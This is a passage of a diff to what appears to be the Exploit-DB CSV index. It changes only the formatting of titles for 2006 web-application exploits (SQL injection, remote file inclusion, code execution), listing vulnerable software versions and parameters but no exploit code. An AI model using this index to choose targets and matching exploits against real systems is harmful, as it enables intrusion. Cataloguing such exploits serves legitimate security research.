(Metasploit)",2006-04-15,Nicob,cgi,webapps,0 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0 -1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - '/inc/start.php _COOKIE' SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 +1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - '/inc/start.php?_COOKIE' SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 -1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 +1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - 'login/language' Remote Code Execution",2006-04-19,rgod,php,webapps,0 1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0 -1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0 +1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - 'surveyid' Remote Command Execution",2006-04-20,rgod,php,webapps,0 1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' SQL Injection",2006-04-21,nukedx,php,webapps,0 -1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 -1706,platforms/php/webapps/1706.txt,"dForum 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 +1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - 'tid' SQL Injection",2006-04-21,nukedx,php,webapps,0 +1706,platforms/php/webapps/1706.txt,"dForum 1.5 - 'DFORUM_PATH' Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps,0 1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 -1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0 +1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - 'lastdate' Remote Code Execution",2006-04-26,RusH,php,webapps,0 1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0 1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion",2006-04-28,[Oo],php,webapps,0 1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps,0 1725,platforms/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps,0 -1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - search.php Remote Code Execution",2006-04-29,"Javier Olascoaga",php,webapps,0 +1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - 'search.php' Remote Code Execution",2006-04-29,"Javier Olascoaga",php,webapps,0 1727,platforms/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1729,platforms/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 -1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0 +1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - 'rootagenda' Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0 1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 -1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 +1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - 'from_contact' SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0 1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Remote Command Execution",2006-05-02,rgod,php,webapps,0 1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0 -1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 +1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - 'Config_rootdir' Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0 -1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 -1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 -1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 +1752,platforms/php/webapps/1752.pl,"StatIt 4 - 'statitpath' Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0 +1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - 'inc' Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0 +1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - 'migrate' Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - 'addressbook.add.php' Remote Code Execution",2006-05-06,[Oo],php,webapps,0 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - 'shopcurrency.asp' SQL Injection",2006-05-06,tracewar,asp,webapps,0 1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 -1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0 +1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - 'relative_script_path' Remote File Inclusion",2006-05-07,beford,php,webapps,0 1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 1765,platforms/php/webapps/1765.pl,"Dokeos Lms 1.6.4 - 'authldap.php' Remote File Inclusion",2006-05-08,beford,php,webapps,0 @@ -16966,8 +16967,8 @@ id,file,description,date,author,platform,type,port 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0 -1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 -1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 +1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Exploit",2006-05-13,rgod,php,webapps,0 +1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Remote Exploit",2006-05-14,rgod,php,webapps,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 @@ -16985,21 +16986,21 @@ id,file,description,date,author,platform,type,port 1811,platforms/php/webapps/1811.php,"XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit",2006-05-21,rgod,php,webapps,0 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1814,platforms/php/webapps/1814.txt,"UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 -1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - (DIR_LIBS) Remote File Inclusion",2006-05-23,rgod,php,webapps,0 +1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 -1821,platforms/php/webapps/1821.php,"Drupal 4.7 - (attachment mod_mime) Remote Exploit",2006-05-24,rgod,php,webapps,0 +1821,platforms/php/webapps/1821.php,"Drupal 4.7 - attachment mod_mime Remote Exploit",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa (Snort Frontend) Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 -1826,platforms/php/webapps/1826.txt,"Socketmail 2.2.6 - (site_path) Remote File Inclusion",2006-05-25,Aesthetico,php,webapps,0 -1827,platforms/php/webapps/1827.txt,"V-Webmail 1.6.4 - (pear_dir) Remote File Inclusion",2006-05-25,beford,php,webapps,0 +1826,platforms/php/webapps/1826.txt,"Socketmail 2.2.6 - 'site_path' Remote File Inclusion",2006-05-25,Aesthetico,php,webapps,0 +1827,platforms/php/webapps/1827.txt,"V-Webmail 1.6.4 - 'pear_dir' Remote File Inclusion",2006-05-25,beford,php,webapps,0 1828,platforms/php/webapps/1828.txt,"DoceboLms 2.0.5 - 'help.php' Remote File Inclusion",2006-05-25,beford,php,webapps,0 1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 -1832,platforms/php/webapps/1832.txt,"Plume CMS 1.0.3 - (manager_path) Remote File Inclusion",2006-05-26,beford,php,webapps,0 +1832,platforms/php/webapps/1832.txt,"Plume CMS 1.0.3 - 'manager_path' Remote File Inclusion",2006-05-26,beford,php,webapps,0 1833,platforms/asp/webapps/1833.txt,"qjForum - 'member.asp' SQL Injection",2006-05-26,ajann,asp,webapps,0 1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities",2006-05-26,ajann,asp,webapps,0 -1835,platforms/php/webapps/1835.txt,"Hot Open Tickets 11012004 - (CLASS_PATH) Remote File Inclusion",2006-05-27,Kacper,php,webapps,0 +1835,platforms/php/webapps/1835.txt,"Hot Open Tickets 11012004 - 'CLASS_PATH' Remote File Inclusion",2006-05-27,Kacper,php,webapps,0 1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 - 'forum.asp' SQL Injection",2006-05-27,ajann,asp,webapps,0 1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - SQL Injection (Add Admin)",2006-05-27,nukedx,asp,webapps,0 1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0 @@ -17017,7 +17018,7 @@ id,file,description,date,author,platform,type,port 1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,php,webapps,0 1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0 -1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 +1855,platforms/php/webapps/1855.txt,"metajour 2.1 - 'system_path' Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 1857,platforms/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution",2006-06-01,Hessam-x,php,webapps,0 1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 - 'ROOT_PATH' Remote File Inclusion",2006-06-01,Kacper,php,webapps,0 1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 @@ -17030,37 +17031,37 @@ id,file,description,date,author,platform,type,port 1868,platforms/php/webapps/1868.php,"PixelPost 1-5rc1-2 - Privilege Escalation",2006-06-03,rgod,php,webapps,0 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - 'prepend.php' Remote File Inclusion",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 -1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 +1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - 'path' Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,php,webapps,0 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 -1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution",2006-06-04,K-159,php,webapps,0 -1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution",2006-06-05,rgod,php,webapps,0 +1876,platforms/php/webapps/1876.pl,"SCart 2.0 - 'page' Remote Code Execution",2006-06-04,K-159,php,webapps,0 +1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - 'includePath' Remote Code Execution",2006-06-05,rgod,php,webapps,0 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - 'da_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 -1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - (fileroot) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 +1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - 'post.php' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - 'jpcache.php' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 -1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 -1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 -1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution",2006-06-08,K-sPecial,php,webapps,0 -1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 -1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 +1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - 'spaw_root' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 +1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - 'footer' Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 +1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - 'email' Remote Code Execution",2006-06-08,K-sPecial,php,webapps,0 +1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - 'ASP' Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 +1895,platforms/php/webapps/1895.txt,"empris r20020923 - 'phormationdir' Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - 'dir[data]' Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 -1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 -1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 -1900,platforms/asp/webapps/1900.txt,"MaxiSepet 1.0 - (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 -1901,platforms/php/webapps/1901.pl,"RCblog 1.03 - (POST) Remote Command Execution",2006-06-11,Hessam-x,php,webapps,0 +1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - 'INCDIR' Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 +1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - 'qb_path' Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 +1900,platforms/asp/webapps/1900.txt,"MaxiSepet 1.0 - 'link' SQL Injection",2006-06-11,nukedx,asp,webapps,0 +1901,platforms/php/webapps/1901.pl,"RCblog 1.03 - 'POST' Remote Command Execution",2006-06-11,Hessam-x,php,webapps,0 1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - 'spaw_root' Remote File Inclusion",2006-06-11,"Federico Fazzi",php,webapps,0 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 1904,platforms/php/webapps/1904.php,"blur6ex 0.3.462 - 'ID' Admin Disclosure / Blind SQL Injection",2006-06-12,rgod,php,webapps,0 -1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 +1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - 'root' Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - 'visview.php' Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - 'phpbb_root_path' File Inclusion",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution",2006-06-13,"Javier Olascoaga",php,webapps,0 @@ -17068,29 +17069,29 @@ id,file,description,date,author,platform,type,port 1913,platforms/php/webapps/1913.txt,"PHP Blue Dragon CMS 2.9.1 - 'template.php' File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0 -1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 +1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - 'tmpImagePath' Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Remote File Inclusion",2006-06-16,K-159,php,webapps,0 -1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 +1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0 -1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 +1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - 'admin_template_path' Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 -1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 -1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0 +1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - 'gorumDir' Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 +1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - 'microcms_path' Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0 1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0 1931,platforms/asp/webapps/1931.txt,"ASP Stats Generator 2.1.1 - SQL Injection",2006-06-19,"Hamid Ebadi",asp,webapps,0 1932,platforms/php/webapps/1932.php,"Ultimate PHP Board 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",php,webapps,0 1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0 1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 -1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 +1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,php,webapps,0 -1941,platforms/php/webapps/1941.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (2)",2006-06-22,rgod,php,webapps,0 +1941,platforms/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,php,webapps,0 1942,platforms/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0 -1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0 -1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection",2006-06-23,rgod,php,webapps,0 +1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - 'inc_dir' Remote File Inclusion",2006-06-22,the_day,php,webapps,0 +1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - Search gadget SQL Injection",2006-06-23,rgod,php,webapps,0 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - 'ROOT_PATH' Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - 'usercp.php' Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 @@ -17103,14 +17104,14 @@ id,file,description,date,author,platform,type,port 1959,platforms/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - 'lid' SQL Injection",2006-06-28,KeyCoder,php,webapps,0 -1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 +1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - '_CONF[path]' Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) 1.34 - 'id' SQL Injection",2006-07-01,x128,php,webapps,0 1969,platforms/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusions",2006-07-01,"Hamid Ebadi",php,webapps,0 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - 'dbinstall.php' Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1974,platforms/php/webapps/1974.txt,"SmartSite CMS 1.0 - 